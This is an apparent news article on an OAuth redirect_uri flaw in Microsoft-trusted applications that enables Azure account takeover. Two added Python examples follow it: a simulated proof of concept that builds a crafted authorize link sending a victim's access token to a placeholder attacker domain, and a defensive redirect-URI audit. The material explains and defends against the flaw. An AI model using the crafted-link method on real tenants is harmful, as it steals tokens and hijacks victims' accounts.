A vulnerability in specific Microsoft OAuth 2.0 applications could let an attacker gain access to, and control of, a victim's Azure account.
The flaw was found by Cyberark researchers, who noticed that many white-listed OAuth applications, at least 54, automatically trust domains and sub-domains that Microsoft had not registered, so anyone could register them. These apps are essentially given "approved" status by default and can ask for an access_token on the user's behalf.
"The combination of these two factors makes it possible to produce an action with the user's permissions – including gaining access to Azure resources, AD resources and more," Cyberark said.
To pull off a takeover, an attacker would have to convince the target to click on a link or visit a compromised website. From there, there are two paths an attacker can take to gain control.
The link-clicking method starts with a crafted link for the Microsoft OAuth web flow that points at one of the vulnerable Microsoft applications: the attacker sets the application_id to match the vulnerable OAuth application, sets the redirect_uri parameter to one of the white-listed domains the attacker now controls, and then changes the resource parameter to the resource he wants to access on behalf of the user.
The victim clicks on the crafted link, and microsoftonline.com, trusting the white-listed redirect_uri, redirects him to the attacker-controlled domain along with a newly issued access token. The attacker's domain then sends API requests with the stolen access token.
The steps involved when using a malicious website are basically the same, but with a few additions. After setting the redirect_uri parameter to the controlled, white-listed domain, the threat actor sets the resource parameter to the resource he wants to access on behalf of the user.
The attacker then places an iframe in a website with its src attribute set to the crafted link, so when the victim browses to the page, the iframe redirects the victim to the attacker's fake website with the newly created access token. Then, as with the link-clicking method, the attacker's site makes API requests with the stolen access token.
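The crafted link, and what the page behind the white-listed redirect_uri receives, as an added example (not code from the original article or from Cyberark). It assumes the v1 authorize endpoint at login.microsoftonline.com, the implicit flow (response_type=token, so the token itself rides in the URL fragment of the redirect), and hypothetical values for the application_id, the attacker-owned domain and the resource; the redirect from microsoftonline.com is simulated locally so the script runs offline.

```python
from urllib.parse import urlencode, urlsplit, parse_qs

# Assumption: Azure AD v1 authorize endpoint (the article only names microsoftonline.com).
AUTHORIZE_ENDPOINT = "https://login.microsoftonline.com/common/oauth2/authorize"


def build_crafted_link(application_id, redirect_uri, resource, state="x"):
    """Build the OAuth web-flow link described in the article.

    application_id: client_id of a vulnerable, Microsoft-white-listed application.
    redirect_uri:   a reply URL under one of that app's trusted but previously
                    unregistered domains, now registered by the attacker.
    resource:       the API the attacker wants a token for, on behalf of the victim.
    response_type=token (implicit flow) is an assumption: it makes the token itself
    come back to redirect_uri instead of an authorization code.
    """
    params = {
        "response_type": "token",
        "client_id": application_id,   # the article's "application_id"
        "redirect_uri": redirect_uri,
        "resource": resource,
        "state": state,
    }
    return f"{AUTHORIZE_ENDPOINT}?{urlencode(params)}"


def simulate_authorize_response(crafted_link, token):
    """Constructed stand-in for the authorization server's behaviour, for offline use:
    for a logged-in victim and a redirect_uri the app trusts, the server redirects the
    browser to that redirect_uri with the access token in the URL fragment.
    """
    req = parse_qs(urlsplit(crafted_link).query)
    redirect_uri = req["redirect_uri"][0]
    fragment = urlencode({
        "access_token": token,
        "token_type": "bearer",
        "resource": req["resource"][0],
        "state": req.get("state", [""])[0],
    })
    return f"{redirect_uri}#{fragment}"


def extract_token(landing_url):
    """What the attacker's page at the redirect target does: read the fragment the
    browser carried over (a browser exposes it as window.location.hash; it is never
    sent to the server, so the attacker's JavaScript has to forward it)."""
    frag = parse_qs(urlsplit(landing_url).fragment)
    return frag["access_token"][0], frag["resource"][0]


if __name__ == "__main__":
    # Hypothetical values; no real application or domain is implied.
    link = build_crafted_link(
        application_id="00000000-0000-0000-0000-000000000000",
        redirect_uri="https://attacker-owned.example/cb",
        resource="https://resource.example/",
    )
    landing = simulate_authorize_response(link, token="tokXYZ")
    print(link)
    print(landing)
    print(extract_token(landing))
```

The point the script makes is that nothing in the exchange checks who owns the host in redirect_uri: the server only checks that the URI is on the application's trusted list, which is exactly the check the unregistered domains passed.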
"While OAuth 2.0 is an excellent solution for authorization, if misused or misconfigured, it could have a tremendous impact, allowing for over-privileged third-party applications or the eventual account takeover by malicious attackers," Cyberark said.
The company has released a free, automated scanning tool that anyone can use to discover similar vulnerable applications in their Azure environment, at https://black.direct/
Cyberark has several recommendations to mitigate the vulnerability.
Make sure that all the trusted redirect URIs configured in the application are under your control, and remove unnecessary redirect URIs; a redirect URI on a domain nobody has registered is exactly the condition the researchers exploited.
Make sure the permissions that the OAuth application asks for are the least privileged ones it needs.
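A small audit of the first recommendation, as an added example (not Cyberark's scanner and not code from the article). It takes the reply URLs exported from an app registration and the list of domains your organisation owns, and flags any reply URL whose host is not under an owned domain, uses a wildcard, or is not HTTPS; the app registration and owned-domain list below are constructed sample data.

```python
from urllib.parse import urlsplit


def host_under(host, owned_domain):
    """True if host is owned_domain itself or a sub-domain of it.
    The leading dot matters: 'evilcontoso.example' must not match 'contoso.example'."""
    host = host.lower().rstrip(".")
    owned = owned_domain.lower().rstrip(".")
    return host == owned or host.endswith("." + owned)


def audit_redirect_uris(redirect_uris, owned_domains, allow_localhost=False):
    """Return a list of (uri, reason) for every redirect URI that should be removed
    or investigated. An empty list means every reply URL is HTTPS, non-wildcard and
    on a domain you control."""
    findings = []
    for uri in redirect_uris:
        parts = urlsplit(uri)
        host = parts.hostname
        if parts.scheme != "https":
            # Local development reply URLs are commonly tolerated; everything else
            # must be HTTPS or the token can be read in transit.
            if allow_localhost and parts.scheme == "http" and host in ("localhost", "127.0.0.1"):
                continue
            findings.append((uri, "non-https scheme"))
            continue
        if not host:
            findings.append((uri, "no host"))
            continue
        if "*" in host:
            findings.append((uri, "wildcard host"))
            continue
        if not any(host_under(host, d) for d in owned_domains):
            findings.append((uri, "host not under an owned domain"))
    return findings


# Constructed sample: reply URLs as they might appear on one app registration.
SAMPLE_REDIRECT_URIS = [
    "https://app.contoso.example/auth",
    "https://login.contoso.example/cb",
    "http://localhost:8080/cb",
    "https://contoso-partner.example/cb",   # a domain the organisation never owned
    "https://notcontoso.example/cb",        # lookalike; a naive suffix check would pass it
    "http://app.contoso.example/legacy",
    "https://*.contoso.example/x",
]
OWNED_DOMAINS = ["contoso.example"]


if __name__ == "__main__":
    for uri, reason in audit_redirect_uris(SAMPLE_REDIRECT_URIS, OWNED_DOMAINS, allow_localhost=True):
        print(f"{reason:32} {uri}")
```

For every URI flagged as "host not under an owned domain", the follow-up question is whether that domain is registered at all; an unregistered one can be bought by anyone and turns the registration into the takeover path the article describes, so either register it yourself or remove the reply URL.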
The post OAuth vulnerability threatens Azure accounts appeared first on SC Media.